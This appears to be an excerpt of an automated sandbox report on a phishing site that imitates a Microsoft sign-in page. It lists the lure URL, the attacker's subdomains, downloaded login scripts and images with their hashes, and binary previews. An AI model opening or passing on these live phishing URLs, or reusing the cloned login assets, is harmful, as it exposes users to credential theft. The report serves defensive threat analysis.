                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal60.phis.win@17/69@30/4
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Browse: https://l1ve.tecuidoc.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access&response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&response_mode=form_post&redirect_uri=https%3a%2f%2fsrmcorp.tecuidoc.com%2fcommon%2ffederation%2foauth2msa&state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAS-2C5ti-584NIeJumk-uG95ixGzviczDKwylWMyoSN07_AyPiCkfEWk6B_UbpnSnixW2pKalFiSWZ-3gUWgVcsPAbMVhwcXAIMEgwKDD9YGBexAm3VWO3s1Lcnw31_0fR5LYUijKdY9bMyUtxSLVJcS1Mz3V1TAnP1i1MrUqPcIgPTi6tSMyIqDSL0XXzdQzySfIptDa0MJ7AJTWBjOsXG8IGNsYOdYRY7wwFOxg08jAd4GX7wtW_9OXXigZnvPF7x6wSUhie6VVRFuYdblhXkm-Z5umtHOZunBQWVuZhUpOlHhUQ5O3qmOGa7p-XbbhBgAAA1&estsfed=1&uaid=86a53df4895b44e08756194225f0ef29&signup=1&lw=1&fl=easi2&fci=https%3a%2f%2f0a413710-7d4f53f3.tecuidoc.com.orgid.com
                                              • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 142.250.64.195, 108.177.11.84, 192.178.50.78, 34.104.35.123, 13.85.23.86, 199.232.210.172, 192.229.211.108, 20.242.39.171, 52.165.164.15, 142.250.64.202, 142.250.217.170, 142.251.35.234, 172.217.3.74, 192.178.50.74, 192.178.50.42, 172.217.165.202, 172.217.15.202, 142.250.217.202, 172.217.2.202, 142.250.189.138, 142.250.64.234, 142.250.217.234, 142.250.64.170, 142.250.64.138, 142.251.35.227, 142.250.217.174
                                              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              No simulations
                                              SourceURL
                                              Screenshothttp://d6yw|@A4c^ydc}hh<) Akds&iAi+3f
                                              No context
                                              No context
                                              No context
                                              No context
                                              No context
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, original size modulo 2^32 1864
                                              Category:downloaded
                                              Size (bytes):673
                                              Entropy (8bit):7.6584200238076905
                                              Encrypted:false
                                              SSDEEP:12:XRt8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:X+UVpkNK0Rwid81p6btk7LqZ6D
                                              MD5:2D2CBA7D7DC75F3BA9DC756738D41A6E
                                              SHA1:F87FD26066ED5E52A65DEE0ED2D581D3C3EA15AC
                                              SHA-256:00E21864CF1BC70302EBB5B496C6C471A7DA8CBF600630B478A3E2376ED20EA2
                                              SHA-512:46F17658CA247C02F612213025350390D8F62179C8DE26725EB17F5CCFAFDD63F2149DA1765D3C2F3A12FE85EF29CAC58457B0D5C2F8DA8DED6E1231A35F199D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                              Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 444173
                                              Category:downloaded
                                              Size (bytes):121210
                                              Entropy (8bit):7.997365559261341
                                              Encrypted:true
                                              SSDEEP:3072:mciMB2rejDVtQSc6AUOBVZLJF/ZKWRDFHr7bXBy:mcCaTQSc6AUOBL3Jjw
                                              MD5:A00CC928896DBDE4EE4E37A500951B36
                                              SHA1:A016F32D2CB80B34B51C7569F9211B744D9BDA36
                                              SHA-256:C229311699D7A3A3A41315EE00DD5AA9BA309EE60118EB74E98CF6686F846CE0
                                              SHA-512:FAFC25A811CBB9310934963B7BC175F0929DBEAD1F302C2C32FA8FF1EAF3278F251CB92943F104BD40E8B1CC2F50D36643793CB13FEA6E9D278D65215AAF0FF8
                                              Malicious:false
                                              Reputation:low
                                              URL:https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/js/ConvergedLogin_PCore_jHSrlUosdD1xxbmcR_lMNA2.js
                                              Preview:............{.8.......f.cw...Vg]yTe;.3q..wS.|.D;..W..........e......X$..A..A..O;.G.....W....o*.........|.G.rxsvt...`...7.~R.......0....(......(vR.Tf.o.;Ae.G.J..*.8...iR..$.Bc.D.*T.{.+'N_+gW.:..6..P....!..Q......G...".X\y~.....Q.M.J.\.?A#...M..'f....I........!E..5.[L..:..{P.........8_...L...u..Ye..b.*iTy.....x.pZ....j.......M.a&,~...A%..B.J....2..$x.Lc'D...`.i......cTt.Z.gs...L..$..s...R..~...*.?.(l..L*.av....a.x.C.......>,.........>x.b.8...}.Qz..}4...3.%.9...b.]..G3..e.W.4....JN...A..."..rry.?]&.N>.L.......R...........,....q........]... .9..,......^....N..q....(}.......C@..U.] ......]....u..E.P..h.....8...@...]U.z.UV.mzg..O.j.vw=..+{Zs..?I..jm%.h/W.c/.-.X.dh.......w....8...:.,...J.d/}+..k..E..\..D!.....,..z.;..G`..y..T.B.......jj...yU2.\.....:.0.M~k;6.E.Zh..!.6........1 O.Rge...."cM.Wb....8......q..8`Z......x.....f.P......~..e........,b.zH.Sw.....Y.@E"1R..'W..pR.a.....Z6].....R....5=V..y...j:...G..9.].z{.>.,=...%._o..3cU.....7e..Q2$
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, original size modulo 2^32 1864
                                              Category:dropped
                                              Size (bytes):673
                                              Entropy (8bit):7.6584200238076905
                                              Encrypted:false
                                              SSDEEP:12:XRt8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:X+UVpkNK0Rwid81p6btk7LqZ6D
                                              MD5:2D2CBA7D7DC75F3BA9DC756738D41A6E
                                              SHA1:F87FD26066ED5E52A65DEE0ED2D581D3C3EA15AC
                                              SHA-256:00E21864CF1BC70302EBB5B496C6C471A7DA8CBF600630B478A3E2376ED20EA2
                                              SHA-512:46F17658CA247C02F612213025350390D8F62179C8DE26725EB17F5CCFAFDD63F2149DA1765D3C2F3A12FE85EF29CAC58457B0D5C2F8DA8DED6E1231A35F199D
                                              Malicious:false
                                              Reputation:low
                                              Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 80160
                                              Category:downloaded
                                              Size (bytes):28601
                                              Entropy (8bit):7.9904177864369705
                                              Encrypted:true
                                              SSDEEP:768:b1YdywRE/Yd15Mo+cXDZ2z2+4uzgHH07OblO/:RYAw2kvMBcXbKzYH0q5q
                                              MD5:4468345FA6FC69156BEDDF58AEC0F6B4
                                              SHA1:E4A126453AE6BDC102003536BFDD7C5AE89F7644
                                              SHA-256:A48889FF6D4639367EA98B29AB6F4C4F74C0EFA88C78B3B7FF7041C7A5A8BAE6
                                              SHA-512:9BF94820172DD424A531FDA90E8AE04ABE25FC3F39D698487FD2E80A5551E0E53C8531CFCB0F71FD5D81464B31CAD43827F977B1DD1BDDC09087B99E78C152CB
                                              Malicious:false
                                              Reputation:low
                                              URL:https://bd6a002d-7d4f53f3.tecuidoc.com/knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2.js?v=1
                                              Preview:...........yW.H.7....{.....).t....(.. ...2@...09...e.......V.T.E..<...`.T.r..w.....g]\._Zgo..w....z..:=.<>8..t-.=.v...Vw....Fa.&.dlMf.`.Of..,...5...A.Y..dd...5.M...<..A>.BQ.M.,...%.p6...?..uIy'.Ao0...d.@...5...qj..k..e...b..3.?....A<.....q:..F...W..V8K.<.[..l.....T...l1.....AB.vy....8.......e&...3:QT..V.`.'..d.z_.g0.Y4o...AzY.u!Y.s.2.<...YfM(......w+..R.<{.z.p.).....Y....\..\4z...)u.G&.4.O..4..r.w.<.,...;..$.N.s...6..g.)F....u...........m:..B4..f..........O._.8..[.c./?t...i..$..'.m..DN.o.?...U....L)}...7....to...-..M.S...`..qe.>..;..C^.....~....9...yH.bJ....k.....l8~..r..h...X..2r..c.....<...KDC_`Y.w|.r..F.P.\n"I..e~....>V.V}>..r..Tf..=.........J.9.....h....MyP.ED../.d.....s$.4..b.f6O3>....n.wB...f..W.......(F........$..0n. .)..dtt1.x2N..Q.[.F..F...).B.L.eU..>.Q..9..i.CcD3. ........&.#...wG...............G....A.~;.|w..........2..n.r|z(...~8?........N..(.........[.5.#.m...V.J/.,4..:>.@e......Q...............j...8>.x..n}.x....:pH.N.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, original size modulo 2^32 3651
                                              Category:dropped
                                              Size (bytes):1435
                                              Entropy (8bit):7.860223690068481
                                              Encrypted:false
                                              SSDEEP:24:XvstSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcN:Xv7DkpyVCGca4b//9z5oPXdbl9688qRU
                                              MD5:DF6A7721C242813411CC6950DF40F9B3
                                              SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                              SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                              SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                              Malicious:false
                                              Reputation:low
                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, original size modulo 2^32 1592
                                              Category:downloaded
                                              Size (bytes):621
                                              Entropy (8bit):7.6770058072183405
                                              Encrypted:false
                                              SSDEEP:12:XDQ7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:X86qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                              MD5:ECC8894D3791BEDDB4E0226F8DAB065A
                                              SHA1:6510EB51E76A49746C526E432455549B50DE5AF1
                                              SHA-256:64C8C0A9EFBC27AD86EAEC90465B75C52AE8CD68F7E76FC9431DC6AE66072AC3
                                              SHA-512:02B20BE98C22EBF7886FE68008C4ED42E3F8FF6ADC8DD7BC1A43A8C4F6FD56CC932EFC5500249A4FAA5024574A841AD10FC8DDB8221CB7226E0E16DEA63F7052
                                              Malicious:false
                                              Reputation:low
                                              URL:https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                              Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:MS Windows icon resource - 6 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 24x24 with PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                              Category:downloaded
                                              Size (bytes):2279
                                              Entropy (8bit):7.354295352983905
                                              Encrypted:false
                                              SSDEEP:24:sb8IQUm7Ar/pPwZRbiHGIc+CozPPdv4CA0H+9dCjnmLr7laO+If7xkLLVP:sbvmiRwZUmD+CoTU0HbEXRzxkLBP
                                              MD5:7E0D59593F3377B72C29435C4B43954A
                                              SHA1:B4C5C39A6DFB460BBD2EACCEB09EC8079FB6A8E2
                                              SHA-256:62D706019A0D80173113EF70FBBEE12F286E8E221534BE788448AADA4B14C8E8
                                              SHA-512:397416A6A96A39F46F22E906A60E56067E5B7B11FB0597A733F862FC077C88D5ED31F51A82709A56F6082FB1F2F72F9A0FE0849E3DD493BB4240C265B546AAD3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://signup.tecuidoc.com/Resources/images/favicon.ico
                                              Preview:............ .....f......... .$...|... .... .5.......00.... .j.......@@.... .....?......... .....2....PNG........IHDR................a....IDATx..1NCA.C..D@."-en.!.h..8@..9h..".....5M....h..-..l..L..P.Y.^luw...r.(.........w...B({....&.F......N.f%..........^&.x}Zu........g..7m......n?..U`....@.M8.g.-..|..S.K.!....].%.I......&.I..`...F |o;....{S....|..VL...E*....IEND.B`..PNG........IHDR..............w=.....IDATx..AJ.A.E_.5...D..$'....<.g.\...!.].!..Y....4...B.......4U...Q..J(...y....%..[t;..>\...~....O....r......e...F....8.d9....4.x.x*W..e...c...~W..P2.........[.....r<..,..>....q.\...U...v.'......!.1.....9..:8............I.I.d.......IEND.B`..PNG........IHDR... ... .....szz.....IDATx..AJC1.E.{..... .;..>\..q+.. ..N.j....."8k.P..IF...M..{.8..F..Z.q...~.y}...0.f..U....Z...@yd...4......DT.B..)......v.8.....)..Lq.[....]_jrG$...3.%......i.vU...C...h0.....rz^.].....9..5.....mU~.E..GMF.X....?..Y.U..|.c.k.v>..@.h..........Nh.u......IEND.B`..PNG........IHDR...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:MS Windows icon resource - 6 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 24x24 with PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                              Category:dropped
                                              Size (bytes):2279
                                              Entropy (8bit):7.354295352983905
                                              Encrypted:false
                                              SSDEEP:24:sb8IQUm7Ar/pPwZRbiHGIc+CozPPdv4CA0H+9dCjnmLr7laO+If7xkLLVP:sbvmiRwZUmD+CoTU0HbEXRzxkLBP
                                              MD5:7E0D59593F3377B72C29435C4B43954A
                                              SHA1:B4C5C39A6DFB460BBD2EACCEB09EC8079FB6A8E2
                                              SHA-256:62D706019A0D80173113EF70FBBEE12F286E8E221534BE788448AADA4B14C8E8
                                              SHA-512:397416A6A96A39F46F22E906A60E56067E5B7B11FB0597A733F862FC077C88D5ED31F51A82709A56F6082FB1F2F72F9A0FE0849E3DD493BB4240C265B546AAD3
                                              Malicious:false
                                              Reputation:low
                                              Preview:............ .....f......... .$...|... .... .5.......00.... .j.......@@.... .....?......... .....2....PNG........IHDR................a....IDATx..1NCA.C..D@."-en.!.h..8@..9h..".....5M....h..-..l..L..P.Y.^luw...r.(.........w...B({....&.F......N.f%..........^&.x}Zu........g..7m......n?..U`....@.M8.g.-..|..S.K.!....].%.I......&.I..`...F |o;....{S....|..VL...E*....IEND.B`..PNG........IHDR..............w=.....IDATx..AJ.A.E_.5...D..$'....<.g.\...!.].!..Y....4...B.......4U...Q..J(...y....%..[t;..>\...~....O....r......e...F....8.d9....4.x.x*W..e...c...~W..P2.........[.....r<..,..>....q.\...U...v.'......!.1.....9..:8............I.I.d.......IEND.B`..PNG........IHDR... ... .....szz.....IDATx..AJC1.E.{..... .;..>\..q+.. ..N.j....."8k.P..IF...M..{.8..F..Z.q...~.y}...0.f..U....Z...@yd...4......DT.B..)......v.8.....)..Lq.[....]_jrG$...3.%......i.vU...C...h0.....rz^.].....9..5.....mU~.E..GMF.X....?..Y.U..|.c.k.v>..@.h..........Nh.u......IEND.B`..PNG........IHDR...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 273262
                                              Category:downloaded
                                              Size (bytes):105811
                                              Entropy (8bit):7.9967326399977825
                                              Encrypted:true
                                              SSDEEP:1536:FmGo21meOG6XTnKG4mRgir4YO97Njfbt0tqu4sq3M0hfTZFFiZE2J/AzE/lvNgFK:IOcGKLP4ii3jjt0tq3s/wejDd/wRqN
                                              MD5:3E6607B14ECB4F1CB01E367A940E3EE7
                                              SHA1:0EF08F027E4E7199DD365445DE8450C984342F95
                                              SHA-256:BC29225D73D3C6E556234070B7CE1E843CA333271C9C954EB4E5E8A05CC3223B
                                              SHA-512:931DB30E6B78661A76410DFB9268C9F8CDC8F20D67A27255B02A8F6EDB3325DC9F0FB4608EA97D6F3974DBB48BBBA22F1EA61B5C6C261D584619AB0E192F1B8E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://bd6a002d-7d4f53f3.tecuidoc.com/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1
                                              Preview:............is.H...}".?.....U.Im..].....Zlwst..Y.`Q..E.-..~..*.....{...L[D.[VVfVf.....[.Fg....q...'J4.Z..MN.'OIx}.5..8..I....D.. ..$..8I[....9.F.R..a..p.R.Q..(.7.......}.4"...Pr.G.,.#7.~:y..)51..r.K.HwD....4*...P..H...Jg..Y.=M.#v.s..G..q.OT.=9".G\P<..^.K...4..#.E..D.......,J.w.{!..(...EW....Dey.5..p.hK)..%7..'.,-E..........*...h.R...*L...*..S"U../..2.!.....9..,s..6..<......'.I.F...gT.n...EW.. ..Eu..z[..cnh...S.u.4.G.5./-).9^Z..:z...R5.FLp.R.^...;.....IF...j.3..9...].....k.>.].cQE...*a.y+/..m...x...... ...T........n.:.f..^.1l.QCU.....h....U".....B*.....M.{...*..}O ......u......_L.(.h...J..ii.^Q.*.K5.....w.S.W7...I.....jR....$cs.h..f....e45.j....a.Vv{L....3....}0.U.YV.N#L.QL.a...P...{nZD...FR.....]........O3c.mZKe.P.2.YN...U...EB.....0..q..p.t...>......,.=.\'...2....Q.(xD('Oo..E...u.:R.E....y..#......E.iG:....U..'......B...(m.......q..:.qgj.M..SrJ..C.j8..>.)....(1Qw.Z.>..4.'..x.F....._...Sb.m.w...O#.q~..:N)8..$...?...=.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:GIF image data, version 89a, 352 x 3
                                              Category:downloaded
                                              Size (bytes):3620
                                              Entropy (8bit):6.867828878374734
                                              Encrypted:false
                                              SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                              MD5:B540A8E518037192E32C4FE58BF2DBAB
                                              SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                              SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                              SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                              Malicious:false
                                              Reputation:low
                                              URL:https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                              Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, original size modulo 2^32 3651
                                              Category:downloaded
                                              Size (bytes):1435
                                              Entropy (8bit):7.860223690068481
                                              Encrypted:false
                                              SSDEEP:24:XvstSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcN:Xv7DkpyVCGca4b//9z5oPXdbl9688qRU
                                              MD5:DF6A7721C242813411CC6950DF40F9B3
                                              SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                              SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                              SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                              Malicious:false
                                              Reputation:low
                                              URL:https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, original size modulo 2^32 1592
                                              Category:dropped
                                              Size (bytes):621
                                              Entropy (8bit):7.6770058072183405
                                              Encrypted:false
                                              SSDEEP:12:XDQ7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:X86qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                              MD5:ECC8894D3791BEDDB4E0226F8DAB065A
                                              SHA1:6510EB51E76A49746C526E432455549B50DE5AF1
                                              SHA-256:64C8C0A9EFBC27AD86EAEC90465B75C52AE8CD68F7E76FC9431DC6AE66072AC3
                                              SHA-512:02B20BE98C22EBF7886FE68008C4ED42E3F8FF6ADC8DD7BC1A43A8C4F6FD56CC932EFC5500249A4FAA5024574A841AD10FC8DDB8221CB7226E0E16DEA63F7052
                                              Malicious:false
                                              Reputation:low
                                              Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 4739
                                              Category:downloaded
                                              Size (bytes):1669
                                              Entropy (8bit):7.871721571810619
                                              Encrypted:false
                                              SSDEEP:48:XIfmQUabfp5bIJne2KXYCZYbiXpnr9/IclAQTb4:YPPfRZYbar9//W
                                              MD5:B46B6618574687626745F227A80EECAB
                                              SHA1:FEED0610A54AE35AFBB77AEFD3E006D8069423AB
                                              SHA-256:479ED74C2C9620F7EEFDC86BD6A43D1DF4FF815C0F75AE29F22D864AEF430A91
                                              SHA-512:9D1A0077037AB4085F4D2A734A3E19BDE2891F936B2FC83AC29487C4F58578D2584D17FA974140DEF032A98808673CA3FDD80BADDD2F9B190795423659B16A71
                                              Malicious:false
                                              Reputation:low
                                              URL:https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/js/asyncchunk/convergedlogin_presetpasswordsplitter_3c78f555810791db83a9.js
